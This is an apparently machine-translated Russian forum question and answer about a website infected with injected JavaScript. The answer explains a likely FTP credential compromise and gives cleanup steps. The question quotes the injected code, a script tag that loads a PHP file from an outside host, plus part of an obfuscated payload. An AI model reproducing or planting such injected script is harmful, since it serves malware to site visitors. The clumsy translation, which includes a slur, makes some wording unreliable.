Вредоносное программное обеспечение Javascripted обнаружило, как удалить?
Google Chrome приветствовал меня обнаружением вредоносного кода. Я смог разыскать код в источнике (поджигатель), но я не знаю, как найти .js сценарии, где коды расположены. Это состоит из 2 сценариев:
<script src="http://12nwsp.serveirc.com//ml.php" type="text/javascript"> </script><script type="text/javascript">var bWUW1aIO9J="YEXI018YEXI035";var fGdfWY1etv0="YEXI03cYEXI073YEXI063YEXI07";и намного больше Вара в этом.
Эти javascripts расположены внизу страницы после закрытия </html> тег..
Забавная вещь... После того как я создал другой субдомен на своем хосте, и я установил Wordpress и сделал некоторые вещи, тот же самый 12nwsp.serveirc.com вернулся.
Теперь я искал и искал и пришел к выводу, что это могло быть создано iframes, (и у меня действительно есть они).
Если Вы хотите посмотреть и выручить меня, это - http://test.donm.nl/vanderwal (это - вид сетевого каталога).
Я просто задаюсь вопросом, существует ли какой-либо инструмент или что-то, что может сказать мне, где те раздражающие сценарии педераста расположены, таким образом, я могу удалить их.
Ty
1 ответ
Вы были взломаны. Вероятно, FTP считают компромисс: Вы получаете троянца на клиентской машине, которая используется для загрузки на сайт, это крадет пароль, и автоматизированное нападение позже входит в систему, добавляют сценарии ко всем файлам HTML.
Можно использовать простой инструмент находки в файлах для определения местоположения <script> блоки, но просто удаление сценариев самостоятельно сделают отрицательный результат. На Вас просто нападут снова.
Существуют некоторые другие возможности, как небезопасные приложения серверной стороны, объединенные с плохими настройками полномочий или более широким компромиссом уровня сервера — хотя другие сайты на том сервере, кажется, не заражены. Компромиссы учетной записи FTP являются наиболее распространенным вектором прямо сейчас.
Необходимо вывести сайт из эксплуатации, просканировать каждую машину, Вы раньше получали доступ к Вашему FTP с несколькими средствами проверки. Не доверяйте всего одному AV: сегодняшние антивирусные средства просто не могут не отставать от ширины нападений. Точно так же они совсем не гарантированы для удаления всего, если Вы были скомпрометированы, поэтому при нахождении чего-нибудь, или если та машина имела какую-либо историю забирания какого-либо троянца в прошлом, необходимо сгладить его и переустановить ОС. (Затем гарантируйте свой браузер, и любые плагины актуальны, и удаляют плагины, Вы не делаете 100%-й потребности, для предотвращения будущего заражения.)
Затем можно изменить пароль FTP, удалить сценарии и забрать сайт онлайн. (И используйте SFTP в будущем.)